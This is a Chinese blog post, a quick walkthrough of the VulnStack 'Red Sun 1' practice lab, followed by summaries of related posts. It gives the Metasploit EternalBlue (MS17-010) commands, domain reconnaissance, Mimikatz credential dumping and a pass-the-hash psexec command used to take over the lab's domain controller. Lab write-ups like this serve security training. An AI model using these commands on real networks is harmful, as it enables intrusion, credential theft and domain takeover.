红日1靶场速通记录

最新推荐文章于 2025-03-15 16:23:43 发布
最新推荐文章于 2025-03-15 16:23:43 发布
阅读量451 收藏 6
点赞数 4
分类专栏: VulnStack-ATT&CK 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46570843/article/details/144756255
版权

环境搭建网上有很多,此文章直接忽略此步。

kali 192.168.3.3
win7 192.168.3.31

fscan

fscan.exe -h 192.168.3.31

在这里插入图片描述
发现存在MS17-010漏洞

MSF

使用MSF的MS17-010攻击模块进行攻击上线

use windows/smb/ms17_010_eternalblue
set RHOST 192.168.3.31

在这里插入图片描述
不成功就多run几次

成功后执行shell获取交互式shell,然后执行ipconfig
在这里插入图片描述发现存在192.168.52.143,猜测在内网中

内网信息收集

在MSF的交互式shell中执行:

ipconfig /all

在这里插入图片描述
说明该主机处在god.org域中,该主机名为stu1
出现乱码,执行chcp 65001

查看在几个域中

net view /domain

在这里插入图片描述

查看域内主机

net view

在这里插入图片描述

定位域控,这里使用查看管理员名字来找域控主机名

net group "domain admins" /domain

在这里插入图片描述
域控主机的主机名是OWA,接着找域控的IP

ping owa.god.org

在这里插入图片描述
得到域控的IP是192.168.52.138

接着上代理

设置代理

上传frp -----缺.dll跑不起来
直接VSHELL上线设置代理

尝试MS-010

添加路由

route add 192.168.52.0 255.255.255.0 2

检测MS17-010

use scanner/smb/smb_ms17_010
set RHOST 192.168.52.138

在这里插入图片描述
利用

use windows/smb/ms17_010_eternalblue
set RHOST 192.168.52.138

等很久没反应,换一种方法

PTH攻击

load kiwi
creds_all

在这里插入图片描述
得到hash:47bf8039a8506cd67c524a03ff84ba4e

使用psexec进行横向

proxychains python3 psexec.py -hashes :47bf8039a8506cd67c524a03ff84ba4e administrator@192.168.52.138 cmd

在这里插入图片描述
成功拿下域控

红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
红队攻防知识分享-红日安全团队靶场1-
beirry的博客
04-14 3155
此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本 外网打点 端口扫描 过扫描端口得知web站点开启 目录扫描 得到用的数据库是mysql和个站点的备份文件 过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1 知道yxcms,直接百度找已知漏洞 访问站点后台,尝试默认密码admin,123456 过百度得知,编辑前台模板的功能可以插入句话木马,则直接拿webshell, 获取路径,直接在备份包里搜索前台
红日靶场1
woshicainiao666的博客
01-13 2072
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
内网攻防——红日靶场
2401_88083440的博客
03-15 1506
学校的课程也刚开始学习计网,本人对于以下几点还是需要学习:(1)进程注入的原理(2)如何实现横向(3)路由与代理由于这篇拖太久了,中途遇到了很多问题,导致整篇下来思路有些乱糟糟的,相信之后熟悉了内网渗透了之后会好很多。对于cs和msf工具的使用还得继续学习,多发现些自己不懂的问题。
红日靶场1
Barlow_121212的博客
05-14 574
8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。5.查看当前用户权限为administrators,使用CS上线。2. 测试mysql数据库连接密码,并进入phpmyadmin。7.发现其他网段,扫描网段主机,创建代理。4.过日志写shell,并用蚁剑连接。10.探测域控主机是否开启445端口。3.尝试导入句话木马,发现拒绝导入。利用方法如法炮制,不在复现。7.使用nmap扫描端口,6.CS 和MSF联合。9.过远程桌面连接。
红日靶场1实战经验
YouthBelief的博客
10-27 1万+
红日靶场0x00前言0x01环境搭建0x02web渗透1 信息收集1.1探测内网存活1.2端口扫描1.2.1 masscan扫描1.2.2 nmap扫描1.2.3 访问80端口1.2.4 目录爆破 看还存在扫描页面服务漏洞利用思路2 漏洞利用2.1 探测phpmyadmin页面2.1 phpmyadmin漏洞利用2.1.1 看是否可以写入文件2.1.2 尝试用日志写入木马getshell2.1.3 蚁剑连接3 拿下webshell后信息收集3.1 是否存在域3.2 网络连接情况 进程 杀软 服务 是否可以
ATT&CK 红日1靶机渗透攻略
weixin_47311099的博客
01-27 2058
环境 此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。 下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境调试 网卡桥接 主机 网卡 IP win7(web服务器) 1.VM2 2.NAT 192.168.52.143 and 192.168.8.142 win2003(内网域成员)
红日-VulnStack靶场1
timesleep的博客
05-31 458
但是这里我的ms17_010没有攻击成功所以后面的步骤无法进行,按照思路的话,使用ms17_010攻击成功后可以拿到权限,进行权限提升。接下来我们对他的内网网段进行扫描,发现其他主机这里使用fscan,也可以使用arp -a来查看arp表。该端口为phpstudy探针页面,可以查看到敏感信息,如绝对路径,对其进行目录扫描。单网卡,仅主机,仅主机网卡地址为192.168.52.138。单网卡,仅主机,仅主机网卡地址为192.168.52.141。仅主机,仅主机网卡地址为192.168.52.143。
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利波大佬神文:谢公子红日靶场 、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建系列靶场过练习、视频教程、博客三位体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 9341
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1192.168.52.141 Windows Server 2008 R2 x64 VMnet1192.168.52.138 kali V
红日靶场
红队是青春
11-16 7287
红日靶场、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
红日靶场1搭建&渗透
m0_75178803的博客
02-03 4220
前面我们登录进去之后,可以看到还有个yxcms的数据库,同时我们进入后台之后,可以看到个 beifen.rar备份文件和yxcms目录,这道题其实还有种getshell的方法,这里我们也记录下。那么如果修改 general_log_file 的值为个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell。,即可将句话木马写入 hack.php 文件中 访问/hack.php 成功写入,也能访问页面,那就用蚁剑直接连下看看。
【内网横向】红日靶场1
网络安全从业者的学习笔记
03-31 3441
次内网渗透 红日靶场下载地址:漏洞详情 靶场地址分配: 模拟外网网段:192.168.174.0/24 模拟内网网段:192.168.52.0/24 攻击机: kali:192.168.174.131 靶机: 域控服务器2008:192.168.52.138(内网) 域成员2003:192.168.52.141(内网) Win7: 192.168.52.143(内网) 192.168.174.130(外网) 1.信息收集 使用nmap对192.168.174.130进行扫描
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
weixin_46022776的博客
06-04 1万+
问题:解决:日志功能未开启,OFF,执行sql开启ON。
红日安全靶场)学习笔记
qq_45244158的博客
09-22 2435
红日安全靶场)学习笔记
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造靶场知识平台。为了进步学习内网渗透,本文将学习并记录红日安全团队提供的个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
红日靶场1(渗透记录
b1n的博客
09-12 2054
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场-1详细解析(适合小白版)
jnszstmei的博客
11-17 4987
红日靶场涉及内网知识,和前期靶场不太样,前期靶场大部分都是单个靶机获得root权限,而这次更综合,后期也会继续学习内网知识,继续打红日靶场,提高自己的综合技能。
红日靶场1学习笔记
一颗小白菜的博客
10-04 1179
靶场看起来不大,打起来还是有很多方法和注意的事项。比如说内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多种方法多条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!
红日靶场1环境搭建
最新发布
03-20
首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值